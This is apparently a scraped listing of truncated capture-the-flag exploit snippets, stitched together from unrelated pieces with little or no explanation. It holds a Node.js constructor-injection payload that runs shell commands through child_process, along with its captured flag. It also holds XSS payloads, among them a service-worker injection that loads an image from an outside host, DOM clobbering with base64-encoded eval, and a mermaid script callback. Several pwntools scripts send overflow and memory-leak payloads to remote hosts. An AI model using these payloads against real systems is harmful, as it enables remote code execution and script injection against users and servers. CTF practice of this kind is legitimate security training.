'+constructor.constructor("return process")().mainModule.require("child_process").execSync('cat * | grep CSR')+'
CSR{r363x_15_fun_r363x_15_l0v3}
'+constructor.constructor("return process")().mainModule.require("child_process").execSync('cat * | grep CSR')+'
CSR{r363x_15_fun_r363x_15_l0v3}
<iframe srcdoc="<form action="https://amazingnotes.asisctf.com:444/" method="POST" id=x> | |
<input name=ext value=es> | |
<textarea name=note> | |
self.addEventListener("fetch", function(event) { | |
if(event.request.url.indexOf("flag") != -1) | |
return; | |
event.respondWith(new Response(` | |
<img src=//p6.is/givemeflag> | |
<script> |
<a id=context><iframe id=context name=apiPublicKey href="x"></iframe><iframe id=context name=auth href="x" b=y></iframe><iframe id=context name=disqusUrl href="x"></iframe></a> | |
<div id="account-nav"></div><div id="anon-account-nav-tmpl">${eval(atob(`YWxlcnQob3JpZ2luKQ`))}</div> | |
* repeat below if you want to improve the reliability | |
```mermaid | |
graph LR; | |
A-->B; | |
click B callback "<script src=https://a.disquscdn.com/1608164631/build/js/abadd50d331d.js></script><script src=https://a.disquscdn.com/1608164631/js/src/global.js></script>" | |
``` |
from pwn import * | |
# p = process('./game') | |
p = remote('cop.ichsa.ctf.today', 8011) | |
for i in range(0x90): | |
p.sendlineafter('Please chose an option', '2') | |
p.sendlineafter('Please chose an option', '2') | |
payload = b'aaaaaa' + p64(0x401813)*16 |
from pwn import * | |
p = remote('20.42.99.115', 3000) | |
payload = b'\1'*150 | |
p.sendline(payload) | |
p.interactive() |
from pwn import * | |
context.log_level = 'debug' | |
# p = process('./qemu-aarch64 -L . -g 1234 ./vuln'.split(' ')) | |
p = remote('pwn.zh3r0.cf', 1111) | |
e = ELF('./vuln') | |
p.send('a'*8) | |
p.recvuntil('a'*8) |
I hereby claim:
To claim this, I am signing this object:
from pwn import * | |
from ctypes import * | |
from time import sleep | |
context.log_level = 'debug' | |
rlibc = CDLL('./libc.so') | |
rlibc.srand(rlibc.time(0)) | |
# p = process('./chall') |
from pwn import * | |
# p = process('./ap-abcs') | |
p = remote('bin.bcactf.com', 49154) | |
payload = b'\0'*(0x50-0x4) | |
payload += p32(0x73434241) | |
p.sendline(payload) |
from pwn import * | |
# p = process('./chall') | |
p = remote('35.224.135.84', 1001) | |
p.sendlineafter('>', '1') | |
pie_leak = int(p.recvline()[40:-3], 16) | |
pie_base = pie_leak - 0x1390 | |
print(hex(pie_leak)) |